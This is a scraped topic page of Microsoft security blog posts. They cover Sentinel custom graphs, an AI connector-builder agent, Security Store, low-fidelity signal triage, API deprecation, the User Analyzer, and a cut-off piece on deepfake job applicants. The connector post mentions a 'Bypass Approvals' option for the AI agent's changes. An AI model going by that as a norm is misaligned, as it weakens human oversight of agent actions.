threat intelligence
27 TopicsAnnouncing public preview of custom graphs in Microsoft Sentinel
Security attacks span identities, devices, resources, and activity, making it critical to understand how these elements connect to expose real risk. In November, we shared how Sentinel graph brings these signals together into a relationship-aware view to help uncover hidden security risks. We’re excited to announce the public preview of custom graphs in Sentinel, available starting April 1 st . Custom graphs let defenders model relationships that are unique to their organization, then run graph analytics to surface blast radius, attack paths, privilege chains, chokepoints, and anomalies that are difficult to spot in tables alone. In this post, we’ll cover what custom graphs are, how they work, and how to get started so the entire team can use them. Custom graphs Security data is inherently connected: a sign-in leads to a token, a token touches a workload, a workload accesses data, and data movement triggers new activity. Graphs represent these relationships as nodes (entities) and edges (relationships), helping you answer questions like: “Who received the phishing email, who clicked, and which clicks were allowed by the proxy?” or “Show me users who exported notebooks, staged files in storage, then uploaded data to personal cloud storage- the full, three‑phase exfiltration chain through one identity.” With custom graphs, security teams can build, query, and visualize tailored security graphs using data from the Sentinel data lake and non-Microsoft sources, powered by Fabric. By uncovering hidden patterns and attack paths, graphs provide the relationship context needed to surface real risk. This context strengthens AI‑powered agent experiences, speeds investigations, clarifies blast radius, and helps teams move from noisy, disconnected alerts to confident decisions. In the words of our preview customers: “We ingested our Databricks management-plane telemetry into the Sentinel data lake and built a custom security graph. Without writing a single detection rule, the graph surfaced unusual patterns of activity and overprivileged access that we escalated for investigation. We didn't know what we were looking for, the graph surfaced the risk for us by revealing anomalous activity patterns and unusual access combinations driven by relationships, not alerts.” – SVP, Security Solutions | Financial Services organization Use cases Sentinel graph offers embedded, Microsoft managed, security graphs in Defender and Microsoft Purview experiences to help you at every stage of defense, from pre-breach to post-breach and across assets, activities, and threat intelligence. See here for more details. The new custom graph capability gives you full control to create your own graphs combining data from Microsoft sources, non-Microsoft sources, and federated sources in the Sentinel data lake. With custom graphs you can: Understand blast radius – Trace phishing campaigns, malware spread, OAuth abuse, or privilege escalation paths across identities, devices, apps, and data, without stitching together dozens of tables. Reconstruct real attack chains – Model multi-step attacker behavior (MITRE techniques, lateral movement, before/after malware) as connected sequences so investigations are complete and explainable, not a set of partial pivots. Reconstruct these chains from historical data in the Sentinel data lake. Figure 2: Drill into which specific MITRE techniques each IP is executing and in which tactic category Spot hidden risks and anomalies – Detect structural outliers like users with unusually broad access, anomalous email exfiltration, or dangerous permission combinations that are invisible in flat logs. Figure 3: OAuth consent chain – a single compromised user consented four dangerous permissions Creating custom graph Using the Sentinel VS Code extension, you can generate graphs to validate hunting hypotheses, such as understanding attack paths and blast radius of a phishing campaign, reconstructing multi‑step attack chains, and identifying structurally unusual or high‑risk behavior, making it accessible to your team and AI agents. Once persisted via a schedule job, you can access these custom graphs from the ready-to-use section in the graphs section in the Defender portal. Figure 4: Use AI-assisted vibe coding in Visual Studio Code to create tailored security graphs powered by Sentinel data lake and Fabric Graphs experience in the Microsoft Defender portal After creating your custom graphs, you can access them in the Graphs section of the Microsoft Defender portal under Sentinel. From there, you can perform interactive, graph-based investigations, for example, using a graph built for phishing analysis to quickly evaluate the impact of a recent incident, profile the attacker, and trace paths across Microsoft telemetry and third-party data. The graph experience lets you run Graph Query Language (GQL) queries, view the graph schema, visualize results, see results in a table, and interactively traverse to the next hop with a single click. Figure 5: Query, visualize, and traverse custom graphs with the new graph experience in Sentinel Billing Custom graph API usage for creating graph and querying graph is billed according to the Sentinel graph meter. Get started To use custom graphs, you’ll need Microsoft Sentinel data lake enabled in your tenant, since the lake provides the scalable, open-format foundation that custom graphs build on. Use the Sentinel data lake onboarding flow to provision the data lake if it isn’t already enabled. Ensure the required connectors are configured to populate your data lake. See Manage data tiers and retention in Microsoft Sentinel | Microsoft Learn. Create and persist a custom graph. See Get started with custom graphs in Microsoft Sentinel (preview) | Microsoft Learn. Run adhoc graph queries and visualize graph results. See Visualize custom graphs in Microsoft Sentinel graph (preview) | Microsoft Learn. [Optional] Schedule jobs to write graph query results to the lake tier and analytics tier using notebooks. See Exploring and interacting with lake data using Jupyter Notebooks - Microsoft Security | Microsoft Learn. Learn more Earlier posts (Sentinel graph general availability) RSAC 2026 announcement roundup Custom graphs documentation Custom graph billingAccelerate connectors development using AI agent in Microsoft Sentinel
Today, we’re excited to announce the public preview of a Sentinel connector builder agent, via VS code extension, that helps developers build Microsoft Sentinel codeless connectors faster with low-code and AI-assisted prompts. This new capability brings guided workflows directly into the tooling developers already use, helping accelerate time to value as the Sentinel ecosystem continues to grow. Learn more at Create custom connectors using Sentinel connector AI agent Why this matters As the Microsoft Sentinel ecosystem continues to expand, developers are increasingly tasked with delivering high‑quality, production‑ready connectors at a faster pace, often while working across different cloud platforms and development environments. Building these integrations involves coordinating schemas, configuration artifacts, Azure deployment concepts, and validation steps that provide flexibility and control, but can span multiple tools and workflows. As connector development scales across more partners and scenarios, there is a clear opportunity to better integrate these capabilities into the developer environments teams already rely on. The new Sentinel connector builder agent, using GitHub Copilot in the Sentinel VS code extension, brings more of the connector development lifecycle -- authoring, validation, testing, and deployment into a single, cohesive workflow. By consolidating these common steps, it helps developers move more easily from design to validation and deployment without disrupting established processes. A guided, AI‑assisted workflow inside VS Code The Sentinel connector builder agent for Visual Studio Code is designed to help developers move from API documentation to a working codeless connector more efficiently. The experience begins with an ISVs API documentation. Using GitHub Copilot chat inside VS Code, developers can describe the connector they want to build and point the extension to their API docs, either by URL or inline content. From there, the AI‑guided workflow reads and extracts the relevant details needed to begin building the connector. Open the VS Code chat and set the chat to Agent mode. Prompt the agent using sentinel. When prompted, select /create-connector and select any supported API. For example in Contoso API, enter the prompt as: @sentinel /create-connector Create a connector for Contoso. Here are the API docs: https://contoso-security-api.azurewebsites.net/v0101/api-doc Next, the agent generates the required artifacts such as polling configurations, data collection rules (DCRs), table schemas, and connector definitions, using guided prompts with built‑in validation. This step‑by‑step experience helps ensure configurations remain consistent and aligned as they’re created. Note: During agent evaluation, select Allow responses once to approve changes, or select the option Bypass Approvals in the chat. It might take up to several minutes for the evaluations to finish. As the connector takes shape, developers can validate and test configurations directly within VS Code, including testing API interactions before deployment. Validation of the API data source and polling configuration are surfaced in context, supporting faster iteration without leaving the development environment. When ready, connectors can be deployed directly from VS Code to accessible Microsoft Sentinel workspaces, streamlining the path from development to deployment without requiring manual navigation of the Azure portal. Key capabilities The VS Code connector builder experience includes: AI‑guided connector creation to generate codeless connectors from API documentation using natural language prompts. Support for common authentication methods, including Basic authentication, OAuth 2.0, and API keys. Automated validation to check schemas, cross‑file consistency, and configuration correctness as you build. Built‑in testing to validate polling configurations and API interactions before deployment. One‑click deployment that allows publishing connectors directly to accessible Microsoft Sentinel workspaces from within VS Code. Together, these capabilities support a more efficient path from API documentation to a working Microsoft Sentinel connector. Testimonials As partners begin using the Sentinel connector builder agent, feedback from the community will help shape future enhancements and refinements. Here is what some of our early adopters have to say about the experience: “The connector builder agent accelerated our initial exploration of the codeless connector framework and helped guide our connector design decisions.” -- Rodrigo Rodrigues, Technology Alliance Director “The connector builder agent helped us quickly explore and validate connector options on the codeless connector framework while developing our Sentinel integration.” --Chris Nicosia, Head of Cloud and Tech Partnerships Start building This public preview represents an important step toward simplifying how ISVs build and maintain integrations with Microsoft Sentinel. If you’re ready to get started, the Sentinel connector builder agent is available in public preview for all participants. In the unlikely event that an ISV encounters any issues in building or updating a CCF connector, App Assure is here to help. Reach out to us here.From Manual Vetting to Continuous Trust: Automating Publisher Screening with AI
Publisher screening is a software supply-chain reality: if a publisher account is compromised, a single update can reach thousands of machines—and recovery is costly. Microsoft Trust & Security Services applies AI to automate screening at onboarding and keep reassessing publishers as new signals appear. Multiple “checker” agents evaluate identity, reputation, and post-approval behavior, then combine evidence into a consistent risk score and an approve/deny/escalate decision, with an evidence-backed explanation that supports auditability and appeals while reducing operational toil.Strengthening your Security Posture with Microsoft Security Store Innovations at RSAC 2026
Security teams are facing more threats, more complexity, and more pressure to act quickly - without increasing risk or operational overhead. What matters is being able to find the right capability, deploy it safely, and use it where security work already happens. Microsoft Security Store was built with that goal in mind. It provides a single, trusted place to discover, purchase, and deploy Microsoft and partner-built security agents and solutions that extend Microsoft Security - helping you improve protection across SOC, identity, and data protection workflows. Today, the Security Store includes 75+ security agents and 115+ solutions from Microsoft and trusted partners - each designed to integrate directly into Microsoft Security experiences and meet enterprise security requirements. At RSAC 2026, we’re announcing capabilities that make it easier to turn security intent into action- by improving how you discover agents, how quickly you can put them to use, and how effectively you can apply them across workflows to achieve your security outcomes. Meet the Next Generation of Security Agents Security agents are becoming part of day-to-day operations for many teams - helping automate investigations, enrich signals, and reduce manual effort across common security tasks. Since Security Store became generally available, Microsoft and our partners have continued to expand the set of agents that integrate directly with Microsoft Defender, Sentinel, Entra, Purview, Intune and Security Copilot. Some of the notable partner-built agents available through Security Store include: XBOW Continuous Penetration Testing Agent XBOW’s penetration testing agents perform pen-tests, analyzes findings, and correlates those findings with a customer’s Microsoft Defender detections. XBOW integrates offensive security directly into Microsoft Security workflows by streaming validated, exploitable AppSec findings into Microsoft Sentinel and enabling investigation through XBOW's Copilot agents in Microsoft Defender. With XBOW’s pen-testing agents, offensive security can run continuously to identify which vulnerabilities are actually exploitable, and how to improve posture and detections. Tanium Incident Scoping Agent The Tanium Incident Scoping Agent (In Preview) is bringing real-time endpoint intelligence directly into Microsoft Defender and Microsoft Security Copilot workflows. The agent automatically scopes incidents, identifies impacted devices, and surfaces actionable context in minutes-helping teams move faster from detection to containment. By combining Tanium’s real-time intelligence with Microsoft Security investigations, you can reduce manual effort, accelerate response, and maintain enterprise-grade governance and control. Zscaler In Microsoft Sentinel, the Zscaler ZIA–ZPA Correlation Agent correlates ZIA and ZPA activity for a given user to speed malsite/malware investigations. It highlights suspicious patterns and recommends ZIA/ZPA policy changes to reduce repeat exposure. These agents build on a growing ecosystem of Microsoft and partner capabilities designed to work together, allowing you to extend Microsoft Security with specialized expertise where it has the most impact. Discover and Deploy Agents and Solutions in the Flow of Security Work Security teams work best when they don’t have to switch tools to make decisions. That’s why Security Store is embedded directly into Microsoft Security experiences - so you can discover and evaluate trusted agents and solutions in context, while working in the tools you already use. When Security Store became generally available, we embedded it into Microsoft Defender, allowing SOC teams to discover and deploy trusted Microsoft and partner‑built agents and solutions in the middle of active investigations. Analysts can now automate response, enrich investigations, and resolve threats all within the Defender portal. At RSAC, we’re expanding this approach across identity and data security. Strengthening Identity Security with Security Store in Microsoft Entra Identity has become a primary attack surface - from fraud and automated abuse to privileged access misuse and posture gaps. Security Store is now embedded in Microsoft Entra, allowing identity and security teams to discover and deploy partner solutions and agents directly within identity workflows. For external and verified identity scenarios, Security Store includes partner solutions that integrate with Entra External ID and Entra Verified ID to help protect against fraud, DDoS attacks, and intelligent bot abuse. These solutions, built by partners such as IDEMIA, AU10TIX, TrueCredential, HUMAN Security, Akamai and Arkose Labs help strengthen trust while preserving seamless user experiences. For enterprise identity security, more than 15 agents available through the Entra Security Store provide visibility into privileged activity and identity risk, posture health and trends, and actionable recommendations to improve identity security and overall security score. These agents are built by partners such as glueckkanja, adaQuest, Ontinue, BlueVoyant, Invoke, and Performanta. This allows you to extend Entra with specialized identity security capabilities, without leaving the identity control plane. Extending Data Protection with Security Store in Microsoft Purview Protecting sensitive data requires consistent controls across where data lives and how it moves. Security Store is now embedded in Microsoft Purview, enabling teams responsible for data protection and compliance to discover partner solutions directly within Purview DLP workflows. Through this experience, you can extend Microsoft Purview DLP with partner data security solutions that help protect sensitive data across cloud applications, enterprise browsers, and networks. These include solutions from Microsoft Entra Global Secure Access and partners such as Netskope, Island, iBoss, and Palo Alto Networks. This experience will be available to customers later this month, as reflected on the M365 roadmap. By discovering solutions in context, teams can strengthen data protection without disrupting established compliance workflows. Across Defender, Entra, and Purview, purchases continue to be completed through the Security Store website, ensuring a consistent, secure, and governed transaction experience - while discovery and evaluation happen exactly where teams already work. Outcome-Driven Discovery, with Security Store Advisor As the number of agents and solutions in the Store grow, finding the right fit for your security scenario quickly becomes more important. That’s why we’re introducing the AI‑guided Security Store Advisor, now generally available. You can describe your goal in natural language - such as “investigate suspicious network activity” and receive recommendations aligned to that outcome. Advisor also includes side-by-side comparison views for agents and solutions, helping you review capabilities, integrated services, and deployment requirements more quickly and reduce evaluation time. Security Store Advisor is designed with Responsible AI principles in mind, including transparency and explainability. You can learn more about how Responsible AI is applied in this experience in the Security Store Advisor Responsible AI FAQ. Overall, this outcome‑driven approach reduces time to value, improves solution fit, and helps your team move faster from intent to action. Learning from the Security Community with Ratings and Reviews Security decisions are strongest when informed by real world use cases. This is why we are introducing Security Store ratings and reviews from security professionals who have deployed and used agents and solutions in production environments. These reviews focus on practical considerations such as integration quality, operational impact, and ease of use, helping you learn from peers facing similar security challenges. By sharing feedback, the security community helps raise the bar for quality and enables faster, more informed decisions, so teams can adopt agents and solutions with greater confidence and reduce time to value. Making agents easier to use post deployment Once you’ve deployed your agents, we’re introducing several new capabilities that make it easier to work with your agents in your daily workflows. These updates help you operationalize agents faster and apply automation where it delivers real value. Interactive chat with agents in Microsoft Defender lets SOC analysts ask questions to agents with specialized expertise, such as understanding impacted devices or understanding what vulnerabilities to prioritize directly in the Defender portal. By bringing a conversational experience with agents into the place where analysts do most of their investigation work, analysts can seamlessly work in collaboration with agents to improve security. Logic App triggers for agents enables security teams to include security agents in their automated, repeatable workflows. With this update, organizations can apply agentic automation to a wider variety of security tasks while integrating with their existing tools and workflows to perform tasks like incident triage and access reviews. Product combinations in Security Store make it easier to deploy complete security solutions from a single streamlined flow - whether that includes connectors, SaaS tools, or multiple agents that need to work together. Increasingly, partners are building agents that are adept at using your SaaS security tools and security data to provide intelligent recommendations - this feature helps you deploy them faster with ease. A Growing Ecosystem Focused on Security Outcomes As the Security Store ecosystem continues to expand, you gain access to a broader set of specialized agents and solutions that work together to help defend your environment - extending Microsoft Security with partner innovation in a governed and integrated way. At the same time, Security Store provides partners a clear path to deliver differentiated capabilities directly into Microsoft Security workflows, aligned to how customers evaluate, adopt, and use security solutions. Get Started Visit https://securitystore.microsoft.com/ to discover security agents and solutions that meet your needs and extend your Microsoft Security investments. If you’re a partner, visit https://securitystore.microsoft.com/partners to learn how to list your solution or agent and reach customers where security decisions are made. Where to find us at RSAC 2026? Security Reborn in the Era of AI workshop Get hands‑on guidance on building and deploying Security Copilot agents and publishing them to the Security Store. March 23 | 8:00 AM | The Palace Hotel Register: Security Reborn in the Era of AI | Microsoft Corporate Microsoft Security Store: An Inside Look Join us for a live theater session exploring what’s coming next for Security Store March 26 | 1:00 PM | Microsoft Security Booth #5744 | North Expo Hall Visit us at the Booth Experience Security Store firsthand - test the experience and connect with experts. Microsoft Booth #1843The Changing Role of Low-Fidelity (LoFi) Signals in the AI Era
Introduction Low-fidelity signals—heuristics that are cheap to compute but often ambiguous—have traditionally been viewed as a necessary annoyance in security operations. In high-volume pipelines, even a modest false-positive rate can translate into operational disruption: unnecessary blocks, costly recoveries, customer frustration, and analyst burnout from constant triage. In the supply chain scanning service, operated by the Trust and Security Services group in Microsoft, LoFi signals include URL and certificate reputation, obfuscation and packer detection, multiple YARA rule families, high-impact API usage (for example, TerminateProcess), and vulnerability detections. Any one of these may be noisy—or may correctly flag perfectly legitimate behavior. The key shift in the AI era is to stop treating LoFi hits as verdicts and start using them as decision points: triggers for deeper, contextual analysis. Two case studies: LoFi signals as routing, not verdicts Case study 1: URL reputation + LLMs—turning noisy signals into zero-day detections Our supply-chain scanning pipeline processes billions of files each day across public package registries. About 150 million files are routed through a URL reputation stage that extracts embedded URLs and evaluates them using threat intelligence plus heuristic rules. At this scale, small error rates become unmanageable: “a little noisy” turns into tens of thousands of daily alerts. Before: Signal overload Heuristic-only URL reputation produced roughly 40,000 blocking detections per day. Although many were genuine threats, the volume made it difficult to distinguish confirmed malware from false positives with confidence. Multiple heuristic layers provided partial signals, but none reliably produced a high-confidence verdict. As a result, analysts spent substantial time triaging files and tuning detection logic, weighing stricter blocking against the risk of disrupting legitimate packages and missing true malware. After: LLM-assisted signal refinement Adding LLM-based contextual analysis on top of URL reputation changed the signal-to-noise ratio. Instead of judging a URL in isolation, the model evaluates how it is used in surrounding code—an install script versus a documentation link, an obfuscated payload download versus a legitimate API call. Outcome: ~2,000× reduction in alerts—down to about 20 high-confidence blocking detections per day—saving substantial analyst time. More importantly, the remaining alerts skew toward true zero-days that other engines in the pipeline were missing. Case study 2: Windows Device Driver scanning pipelines—scaling LoFi signals into actionable detections Beyond supply-chain package scanning, LoFi-driven routing patterns also show up in third-party device driver scanning used for the Windows certification program and post publishing rescan workflows. The pipeline operates at high volume under strict performance and reliability constraints, making “scan everything deeply” unrealistic. The device driver pipeline receives about 70,000 submissions per month (January 2026 reference). From these submissions, roughly 1 million individual files are extracted and scanned. At this scale, even moderately noisy heuristics become unmanageable if treated as high-confidence detections. Before: high-volume, low-confidence heuristics Several LoFi heuristic detectors (primarily YARA rule-based) run in audit (aka telemetry-only) mode in the driver pipeline, including: Presence of network routing/manipulation (for example, network filter drivers): ~19,000 files/month Use of a process-termination API by a driver: ~5,000 files/month Obfuscated or packed driver: ~500 files/month These detectors are fast and inexpensive, but inherently imprecise. Many flagged files reflect legitimate driver behavior (packing, process termination, filtering logic), so turning every hit into enforcement would create an unacceptable volume of false positives. Without refinement, LoFi hits function best as indicators of potential risk—not actionable verdicts. After: selective escalation and targeted analysis Instead of treating every LoFi hit equally, the pipeline escalates only the top 4% of results for deeper inspection. Those samples get additional correlation and malware analyst review, which enables the creation of concrete, high-confidence signatures that can be safely enforced at scale. With this targeted escalation model: An average of ~5 new blocking detections are added per month Each detection typically identifies 10–100 malicious files Confirmed malware is blocked without broadly impacting legitimate driver submissions This approach preserves throughput while focusing scarce expert time on the most suspicious artifacts. In other words, LoFi signals stop being “detections” and become efficient filters that route the right samples into high-cost analysis—where you can then generate durable, high-confidence blocking rules. Key takeaways LoFi is a routing layer. In AI era pipelines, the goal is not to make every cheap heuristic perfectly precise—it is to use it to decide where to spend expensive compute and analyst time. Context beats indicators. LLMs can turn ambiguous URL signals into high-confidence decisions by reasoning about usage and intent, not just matching patterns. Escalate a small fraction, learn continuously. Selecting the top few percent for deeper analysis keeps throughput high and creates a feedback loop that produces enforceable signatures. Measure success by outcomes. The win is reduced alert volume and improved catch quality (for example, zero-days and durable blocking rules) rather than “more detections.” Conclusion As threat actors move faster and zero-days become more common, security systems have to make better decisions under tighter latency and cost constraints. The answer is not to replace LoFi signals with AI everywhere; it is to combine them. Cheap heuristics can cover the full surface area, while AI (and human expertise) is reserved for the small subset of events that truly deserve deeper reasoning. Both case studies illustrate the same pattern. In supply-chain scanning, LLMs transformed a 40,000-per-day alert stream into ~20 high-confidence blocks—surfacing zero-days that were previously lost in the noise. In device driver scanning, selective escalation of the top LoFi hits converts “interesting but unenforceable” heuristics into a steady stream of high-confidence blocking signatures. In practice, the most scalable security posture is a tiered one: LoFi for breadth, AI for context, and analysts for the hardest calls.Action Required: Transition from HTTP Data Collector API in Microsoft Sentinel
Microsoft Sentinel continues to evolve to provide more secure, scalable, and reliable data ingestion experiences. As part of this evolution, we want to remind customers and partners of an important upcoming change that may impact custom data ingestion and integrations like detection rules, playbooks etc. HTTP Data Collector API will no longer be eligible for Incident Support after September 2026 Starting September 14, 2026, connectors and tables that rely on the legacy HTTP Data Collector API will no longer be eligible for incident support in Microsoft Sentinel, consistent with Azure’s 2024 announcement. Any data sources, custom integrations, or connectors that continue to rely on the HTTP Data Collector API beyond this date may experience ingestion issues. We highly recommend customers transition to a supported ingestion alternative before this deadline, to avoid any service interruptions. Who is impacted? You may be impacted by this change if you are using: Custom-built scripts or applications that ingest data using the HTTP Data Collector API. Any custom data connectors (likely built as Azure Functions) with HTTP Collector API. Any data connector from the in-product Content Hub, provided by Microsoft or one of our partner ISVs, that will be rewritten prior to the API deprecation date. Classic custom log tables (usually marked type: Classic) created using HTTP Data Collector API. Recommended migration paths We recommend transitioning to supported, DCR‑based ingestion methods. The appropriate path depends on how data is currently ingested. 1. Update to the latest connector version in Content Hub (Recommended for most customers): For customers using Microsoft or partner‑provided connectors: Many existing connectors have been released with new versions using modern ingestion and are available as updated versions in the Content Hub. These newer versions use DCR‑based ingestion and are fully supported. 1.1 Identify the Connector Go to Microsoft Defender portal Navigate to Content Hub Search for the connector you are currently using, If your existing connector mentions HTTP Data Collector API. 1.2 Install the New CCF Connector Navigate to Content Hub Search for the same connector name Select the version labeled “(via Codeless Connector Framework)” Click Install/Update the CCF connector and complete the setup wizard (authentication, configuration, polling schedule, etc.) Note: As Microsoft Sentinel transitions to the Codeless Connector Framework (CCF), customers migrating from Azure Functions–based connectors should expect intentional architectural changes. These include new or updated table names and schemas using the Log Ingestion API, and a move to Data Collection Rules (DCRs) and Data Collection Endpoints (DCEs) for modern, governed ingestion. Both connectors may coexist temporarily; installing the CCF connector does not automatically remove the Azure Function connector. 1.3 Validate Data Ingestion Confirm new data is flowing into CCF backed tables. Monitor ingestion for a stabilization period (typically several days). Validate that Logs are flowing as expected, there are no ingestion errors and expected log volume is observed. 1.4 Migrate Dependent Content Update any workloads out of Microsoft provided content types that depend on the old Azure Function–based tables: Analytics rules Hunting queries Workbooks Playbooks / automations Parsers or custom queries 2. Logs Ingestion API (for custom applications and direct ingestion) For customers or ISV partners that ingest data directly into Sentinel tables using custom applications: The Azure Monitor Logs Ingestion API is the supported replacement for the legacy HTTP Data Collector API. Key benefits: Secure, OAuth‑based authentication Data Collection Rules (DCRs) for schema control Improved reliability, scalability, and governance Long‑term platform support Customers using custom ingestion pipelines should plan to migrate their applications to the Logs Ingestion API prior to the deprecation date. Migration Benefits (Azure Function → CCF) Lower Total Cost of Ownership (TCO) , no infra: saves compute cost and eliminates infrastructure maintenance. One‑time modernization: clean queries (no type suffixes) and one‑time migration with no ongoing API churn. Built‑in data shaping & quality gates: transformations (filter/modify during ingestion) plus schema validation to enforce ingestion quality. Flexible routing & modern tables: multiple destinations (route to multiple tables) with modern table format for better performance/features. Governed & future‑proof ingestion: granular RBAC (DCR + identity control), Sentinel data lake mirroring / lake‑only ingestion, and Microsoft’s supported API going forward. Summary The transition from the HTTP Data Collector API to the Azure Monitor Logs Ingestion API is essential to ensure continued data ingestion and improved security. The new API provides key benefits such as OAuth‑based authentication, data filtering and transformation during ingestion, and fine‑grained RBAC. Organizations are strongly encouraged to migrate to the new API ahead of the September 14, 2026 retirement date. Support Resources: If you are an Independent Software Vendor (ISV) and you encounter any difficulty building your Microsoft Sentinel data connector, Microsoft Security's App Assure program is available to assist. Contact us at AzureSentinelPartner@microsoft.com.Announcing AI Entity Analyzer in Microsoft Sentinel MCP Server - Public Preview
What is the Entity Analyzer? Assessing the risk of entities is a core task for SOC teams - whether triaging incidents, investigating threats, or automating response workflows. Traditionally, this has required building complex playbooks or custom logic to gather and analyze fragmented security data from multiple sources. With Entity Analyzer, this complexity starts to fade away. The tool leverages your organization’s security data in Sentinel to deliver comprehensive, reasoned risk assessments for any entity you encounter - starting with users and urls. By providing this unified, out-of-the-box solution for entity analysis, Entity Analyzer also enables the AI agents you build to make smarter decisions and automate more tasks - without the need to manually engineer risk evaluation logic for each entity type. And for those building SOAR workflows, Entity Analyzer is natively integrated with Logic Apps, making it easy to enrich incidents and automate verdicts within your playbooks. *Entity Analyzer is rolling out in Public Preview to Sentinel MCP server and within Logic Apps starting today. Learn more here. **Leave feedback on the Entity Analyzer here. Deep Dive: How the User Analyzer is already solving problems for security teams Problem: Drowning in identity alerts Security operations centers (SOCs) are inundated with identity-based threats and alert noise. Triaging these alerts requires analyzing numerous data sources across sign-in logs, cloud app events, identity info, behavior analytics, threat intel, and more, all in tandem with each other to reach a verdict - something very challenging to do without a human in the loop today. So, we introduced the User Analyzer, a specialized analyzer that unifies, correlates, and analyzes user activity across all these security data sources. Government of Nunavut: solving identity alert overload with User Analyzer Hear the below from Arshad Sheikh, Security Expert at Government of Nunavut, on how they're using the User Analyzer today: How it's making a difference "Before the User Analyzer, when we received identity alerts we had to check a large amount of data related to users’ activity (user agents, anomalies, IP reputation, etc.). We had to write queries, wait for them to run, and then manually reason over the results. We attempted to automate some of this, but maintaining and updating that retrieval, parsing, and reasoning automation was difficult and we didn’t have the resources to support it. With the User Analyzer, we now have a plug-and-play solution that represents a step toward the AI-driven automation of the future. It gathers all the context such as what the anomalies are and presents it to our analysts so they can make quick, confident decisions, eliminating the time previously spent manually gathering this data from portals." Solving a real problem "For example, every 24 hours we create a low severity incident of our users who successfully sign-in to our network non interactively from outside of our GEO fence. This type of activity is not high-enough fidelity to auto-disable, requiring us to manually analyze the flagged users each time. But with User Analyzer, this analysis is performed automatically. The User Analyzer has also significantly reduced the time required to determine whether identity-based incidents like these are false positives or true positives. Instead of spending around 20 minutes investigating each incident, our analysts can now reach a conclusion in about 5 minutes using the automatically generated summary." Looking ahead "Looking ahead, we see even more potential. In the future, the User Analyzer could be integrated directly with Microsoft Sentinel playbooks to take automated, definitive action such as blocking user or device access based on the analyzer’s results. This would further streamline our incident response and move us closer to fully automated security operations." Want similar benefits in your SOC? Get started with our Entity Analyzer Logic Apps template here. User Analyzer architecture: how does it work? Let’s take a look at how the User Analyzer works. The User Analyzer aggregates and correlates signals from multiple data sources to deliver a comprehensive analysis, enabling informed actions based on user activity. The diagram below gives an overview of this architecture: Step 1: Retrieve Data The analyzer starts by retrieving relevant data from the following sources: Sign-In Logs (Interactive & Non-Interactive): Tracks authentication and login activity. Security Alerts: Alerts from Microsoft Defender solutions. Behavior Analytics: Surfaces behavioral anomalies through advanced analytics. Cloud App Events: Captures activity from Microsoft Defender for Cloud Apps. Identity Information: Enriches user context with identity records. Microsoft Threat Intelligence: Enriches IP addresses with Microsoft Threat Intelligence. Steps 2: Correlate signals Signals are correlated using identifiers such as user IDs, IP addresses, and threat intelligence. Rather than treating each alert or behavior in isolation, the User Analyzer fuses signals to build a holistic risk profile. Step 3: AI-based reasoning In the User Analyzer, multiple AI-powered agents collaborate to evaluate the evidence and reach consensus. This architecture not only improves accuracy and reduces bias in verdicts, but also provides transparent, justifiable decisions. Leveraging AI within the User Analyzer introduces a new dimension of intelligence to threat detection. Instead of relying on static signatures or rigid regex rules, AI-based reasoning can uncover subtle anomalies that traditional detection methods and automation playbooks often miss. For example, an attacker might try to evade detection by slightly altering a user-agent string or by targeting and exfiltrating only a few files of specific types. While these changes could bypass conventional pattern matching, an AI-powered analyzer understands the semantic context and behavioral patterns behind these artifacts, allowing it to flag suspicious deviations even when the syntax looks benign. Step 4: Verdict & analysis Each user is given a verdict. The analyzer outputs any of the following verdicts based on the analysis: Compromised Suspicious activity found No evidence of compromise Based on the verdict, a corresponding recommendation is given. This helps teams make an informed decision whether action should be taken against the user. *AI-generated content from the User Analyzer may be incorrect - check it for accuracy. User Analyzer Example Output See the following example output from the user analyzer within an incident comment: *IP addresses have been redacted for this blog* &CK techniques, a list of malicious IP addresses the user signed in from (redacted for this blog), and a few suspicious user agents the user's activity originated from. typically have to query and analyze these themselves, feel more comfortable trusting its classification. The analyzer also gives recommendations to remediate the account compromise, and a list of data sources it used during analysis. Conclusion Entity Analyzer in Microsoft Sentinel MCP server represents a leap forward in alert triage & analysis. By correlating signals and harnessing AI-based reasoning, it empowers SOC teams to act on investigations with greater speed, precision, and confidence. *Leave feedback on the Entity Analyzer hereFake Employees, Real Threat: Decentralized Identity to combat Deepfake Hiring?
In recent months, cybersecurity experts have sounded the alarm on a surge of fake “employees” – job candidates who are not who they claim to be. These fraudsters use everything from fabricated CVs and stolen identities to AI-generated deepfake videos in interviews to land jobs under false pretenses. It’s a global phenomenon making headlines on LinkedIn and in the press. With the topic surfacing everywhere, I wanted to take a closer look at what’s really going on — and explore the solutions that could help organizations respond to this growing challenge. And as it happens, one solution is finally reaching maturity at exactly the right moment: decentralized identity. Let me walk you through it. But first, let’s look at a few troubling facts: Even tech giants aren’t immune. Amazon’s Chief Security Officer revealed that since April 2024 the company has blocked over 1,800 suspected North Korean scammers from getting hired, and that the volume of such fake applicants jumped 27% each quarter this year (1.1). In fact, a coordinated scheme involving North Korean IT operatives posing as remote workers has infiltrated over 300 U.S. companies since 2020, generating at least $6.8 million in revenue for the regime (2.1). CrowdStrike also reported more than 320 confirmed incidents in the past year alone, marking a 220% surge in activity (2.2). And it’s not just North Korea: organised crime groups globally are adopting similar tactics. This trend is not a small blip; it’s likely a sign of things to come. Gartner predicts that by 2028, one in four job applicant profiles could be fake in some way (3). Think about that – in a few years, 25% of the people applying to your jobs might be bots or impostors trying to trick their way in. We’re not just talking about exaggerated resumes; we’re talking about full-scale deception: people hiring stand-ins for interviews, AI bots filling out assessments, and deepfake avatars smiling through video calls. It’s a hiring manager’s nightmare — no one wants to waste time interviewing bots or deepfakes — and a CISO’s worst-case scenario rolled into one. The Rise of the Deepfake Employee What does a “fake employee” actually do? In many cases, these impostors are part of organized schemes (even state-sponsored) to steal money or data. They might forge impressive résumés and create a minimal but believable online presence. During remote interviews, some have been caught using deepfake video filters – basically digital masks – to appear as someone else. In one case, Amazon investigators noticed an interviewee’s typing did not sync with the on-screen video (the keystrokes had a 110ms lag); it turned out to be a North Korean hacker remotely controlling a fake persona on the video call (1.2). Others refuse video entirely, claiming technical issues, so you only hear a voice. Some even hire proxy interviewees – a real person who interviews in their place. The level of creativity is frightening. Once inside, a fake employee can do serious damage. They gain legitimate access to internal systems, data, and tools. Some have stolen sensitive source code and threatened to leak it unless the company paid a ransom (1). Others quietly set up backdoor access for future cyberattacks. And as noted, if they’re part of a nation-state operation, the salary you pay them is funding adversaries. The U.S. Department of Justice recently warned that many North Korean IT workers send the majority of their pay back to the regime’s illicit weapons programs (1)(2.3). Beyond the financial angle, think of the security breach: a malicious actor is now an “insider” with an access badge. No sector is safe. While tech companies with lots of remote jobs were the first targets, the scam has expanded. According to the World Economic Forum, about half of the companies targeted by these attacks aren’t in 